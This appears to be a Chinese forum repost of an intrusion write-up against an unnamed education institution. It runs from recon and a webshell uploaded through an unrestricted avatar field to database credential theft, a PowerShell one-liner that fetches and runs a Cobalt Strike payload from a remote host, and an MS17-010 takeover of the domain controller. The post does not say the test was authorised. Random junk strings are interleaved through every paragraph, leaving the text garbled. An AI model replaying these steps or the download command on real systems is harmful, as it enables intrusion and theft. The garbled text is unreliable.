找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2462|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

% M* J; E/ M( o* O 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路4 l; [! {1 j+ k5 B m, C

$ I5 M0 m7 ~+ r/ D! |0 ?

" ~" s( z9 K/ O/ }2 G3 u, S! |  - G1 U: h& l- G3 ~8 ~8 @

. B4 y U3 Y! X' p& y7 s

0 X7 O+ ]6 E1 Z* o* l 正文. W6 L0 S- D* v6 ~6 n; r) Q g

& j9 w; v" ^6 Z; _. a

, A- m8 v9 W0 V/ r+ u( Z6 U   ; D m' ~9 B* H% P

" s# z5 {2 F8 Y/ L

0 M2 h( r# Q1 X! X2 p! z, b( [0 c 目标:www.xxxx.com(一家教育机构)
" m& @. F' Z( m6 B% t( [# j
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
% S/ ^; Y5 l8 T' x' `! c$ n

3 q6 k* y# x# F) l1 g

. B/ b1 u9 W3 @: U* ] e# e5 m( v$ D vshapes= . l) o" G0 `. G" ^$ S7 r

1 R% V0 y/ n; q5 c, ~% K$ `: E) A

8 p9 O x% ^) f! p) n 进行了简单的信息搜集
: B' K6 y! p6 Z) Q/ U
/ M5 S3 c( B. `; W8 x$ l9 x* f$ S
1 _2 c+ ~6 d7 S8 q

! A- g7 k C5 V

$ c! S- C: P: U' u& l) t& i# R 子域名搜集 8 I5 ~- F) i1 V8 \+ }3 s: f

! m) ^' [/ m0 c& P, v) d

, i" A. F5 [5 [- [- M1 E vshapes= & ^. T1 O3 V# J; {

9 C! I0 C, B; U, D% |5 t6 s

4 ?7 K( K8 b3 P! [6 Q" e fofa找资产
' [/ s, e7 Y$ V
, z$ o! r, S1 i) b5 `$ c
& G6 P; x7 v+ N' G

' @* Z% m- S2 t0 Z6 t

8 M9 S _# ^* p6 N7 P$ h* | vshapes=; L( m9 |* z) C+ O

3 c) m5 K( u- Q

- u# O, b5 a/ w% l; n5 ~0 _ 一共七个资产。去重之后只有两个。
3 b3 A3 u: ^; I( o( s4 r* K
# I! M% L6 H% L9 Y' a2 I
6 n' F2 p3 q+ a" ^. d$ [

( [, v4 |% m3 s: @; I

# J3 o5 o: m v1 c% l 目录探测 ( l2 W0 {, _' X, D- P0 g

8 {) {2 t, i1 |- ]

2 o; N0 @5 J, } p+ r vshapes=. C' u, {# ]' n# Y; W$ f, u: B

' p) p! p6 s% S% T6 s7 `; S

; K0 b9 t6 b3 C+ V/ P- A5 q9 Q9 Z6 g 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
- `' a* `* X7 c! @
5 d3 j M, v- \ W5 J$ J' |
5 O3 w7 J0 g" b) q! m0 u/ h

1 w9 C, l3 }0 r6 H

4 T: b! I$ p: X 我又尝试了通过修改返回包来绕过登录界面8 S) b0 Q- Y1 e

0 U7 T) x0 K! i$ d: G" w

# z4 U+ H6 `+ _0 ?* O6 F vshapes=/ @: @. m o* ]' r2 @' F9 f

, J6 n2 [! n: v# W: Z8 ^. r

; @2 t) V* z" s0 Z4 x 还是不行,尝试注入无果 " \0 W8 ]: m8 w! h) v

* ?" ?, G4 I3 u" [# @3 N+ G+ L

# Y, I9 L2 t# t' O0 n9 k/ P, w% Q vshapes= , f6 z7 R; e- }9 D' z8 p

9 V" O3 z' f/ v' k/ z

% J* s2 v3 L z. T 不过我目录探测出了一处Spring信息泄露
/ |2 P7 V! h: C" ^, F/ K9 N
/ W# O0 {' U4 L/ @& f
; l) r' I+ g5 v, p" D

1 }7 X) H$ m1 i k, b, S& G

4 d3 t" R" j9 l$ D3 O% n7 p vshapes= 9 @& B1 Z" o1 z, ?+ e% A

6 `+ J' h4 d6 K7 r3 C& c

t- L( R2 Z4 T, g# K9 e 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录3 I, ]; N. @* p2 W, [; Z

$ D9 M% s/ v! {. A

9 S: m; {, J( H% p0 v. P# l7 a# V vshapes=' Y/ ~7 [$ H" A+ O1 ?. R P0 D3 D

, [/ q) \" w! }8 N% t1 m- s# Z

2 y) p3 d: s1 \' n4 b 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。# m, j* ]+ T, D( T

4 u7 _$ W( _/ a5 n8 I/ e

% r( N9 M+ O/ ] z vshapes= # ^' l7 `5 \) R: ~7 @$ N) k T3 Y

+ i1 H: v9 T0 ^& X( q# \; t

, i) N3 Y7 m/ w% r1 }' {0 s% M 获取有些师傅到这一步就手机抓包电脑测了。: i) c0 S* |5 V) \

. ~" f; L7 `9 G2 h4 w

6 Q# W0 N0 a( Y1 x Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。% e0 l% C. P, B( T2 ^

& v x: p3 p, n* _

- r/ c4 G4 ?6 V+ r- z 其中在一个公众号发现了小程序,可以进行注册。8 J$ T$ b& A' A1 j/ ]0 c9 H! \

5 g5 g. _+ G4 B: m4 s, {2 X7 I i5 {& a

9 D) O! m' p2 w2 E 看到了头像上传,尝试上传获取WebShell 1 B8 g; a2 o0 M% T4 P4 g3 d+ E

/ l( K4 K% A) p6 b J W

/ @- P D% x/ Z% |- d: k- t7 c vshapes= ) q; }8 `! D ^ s4 H. W% x

# h6 n2 w$ j1 K) |0 Y! t- F! R

' a, I, [2 L9 _- \) Q 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问' }& A o: P: l2 H

/ w. ^) V8 l: m

; I; i* b- b' _# P t( R vshapes= , V7 q" I4 c5 G' `3 M# H' i3 m

) f( W4 {* N7 \( o; K

5 e- P* H7 m0 l2 u! w8 t4 c! a 然后上了大马: ?+ N; l3 S* G/ D9 b3 ?: ]

) ~: |, c' m0 r: ^

. ^4 Z b8 E$ o+ P8 {( P vshapes= + ]/ f' q* x( a4 D% j& @

! C" t' B, g$ l) b; x. E

' l0 o G. ]2 C5 Q vshapes= . _3 y' z! D' i6 C: m e0 z! K

$ |6 m9 ]. N/ S1 K+ G& a! a# `

& a2 x/ ~; E9 @& F/ G% ? 通过翻找文件发现数据库账号密码, m8 u% ]7 d2 V a! J: j

+ V) A( E$ x. I2 I7 F K4 `

" t$ ]: d( }" x8 ^) B$ W8 ~ vshapes=# d" B$ o" R: j- T) u9 s# c

- n, @2 ?7 I, h5 |8 s, y/ w

- P @1 F$ I% _) S( G3 R --内网渗透 : h& ?# A3 X" d+ h& q- O- E

7 y1 |/ ~: U! U2 G$ U6 s/ e

- ~- P. H) ^& A% y# N 直接通过powershell执行 cs上线 " f$ A% B* O! Z4 p

' [& `" s6 ~" N5 K7 @

. ^6 V8 o5 Q/ e8 z4 b* |( P powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" 5 W8 E6 u; ]: P/ o6 K& L) H& W

- `! d( q5 `8 x

* j5 Z( D% l6 Y4 l3 D$ u vshapes=0 m' s3 k5 I8 ?" l+ L

, S. D$ x, _( J# m2 T) L% @" w

- T1 V% m p# x: `8 T. q 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 # d' f5 ~9 ?7 e$ y" p

+ m' S' i+ x: y

. Q+ p3 p) A8 A# K, E vshapes=0 y ^; ^% i5 I

7 _% k9 B1 g% r" f

- s3 f0 ^* ?; N/ d- |) ]6 O 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
0 c& C [ i+ }! X4 {1 k# \
, L% O: i( ?4 k5 |1 Q7 h7 N
' e/ @3 O# C9 K8 P# b' J6 N
8 J/ b; B0 F$ _+ i- @1 h

5 d! w" q- |4 i/ v

& ]/ q j7 V$ Z9 I vshapes= " b8 _8 G& c) P! z+ @5 i

+ {; R9 t2 T6 R+ V$ I8 X

9 w+ `+ a6 `( f7 C 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
# p% B2 l2 Q% o. D, c9 N
1 |$ a8 R4 Q( `
; H- L4 }7 r0 ]2 }

/ W) h: Y: |0 L. O7 L+ ~" \

- h" I g0 z+ h5 z vshapes= \ d& C& j. e# p! [1 S: Y

( | r: y7 E% F( n

4 `) q1 U- }, V7 N' b7 @. n- W
- b0 H- J) G" |7 m: G. U! x
1 t; G; v P- ^( P( \0 p; y
: r7 z2 m$ D3 Q. V

( P* l9 d- Q6 \8 \, Y& c

' ^6 N! i5 F3 P' p* { G5 s) Y  # K2 q3 |: P8 \. z

( h, ?+ ?$ a" R" n- P8 M: M& S$ z2 h

& P1 N: `# H& Y) L 小结 5 s: S0 T! _4 e% \. l

, J9 n! r% ~$ b# k

, D3 W3 I( w7 ^0 f/ A0 z   ' v" c! h b' Z6 z c

, U) Y. z( a& G

/ P' P, n: _1 S6 u 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路! 0 f" x' q$ ]4 s9 J6 G

" f" s- m7 r) b2 Y1 ~

+ @* Z' Y4 f: K& j$ j   ( h, A% M( k% V6 f9 Y5 A: J

+ q4 u; _2 I( s& C E
    0 A8 _5 z7 j; ^, c1 l9 s% V6 G, ~* [
  • ; ]/ K( k U% D% e  - K* J. U+ S0 f: D
  • 8 O* Z9 n L* S$ f" @, [: y
  • 4 ]1 l, J5 t8 j6 S$ ^) q   6 z6 |7 P8 N7 @" U+ f
  • ~. A/ X1 o/ j' F, B' v' X4 r
5 ]" q% z* g+ a4 q/ ?5 J

0 ]" T- Q4 h. y6 ?. L. L/ P+ E 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html 1 @. [# `6 G" S6 D

4 f8 `4 Y# ?6 k2 t

; S/ F: \/ G- c, T9 w' c  + o' k+ k2 ~% ?8 J* n( A# Y5 c) Z

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表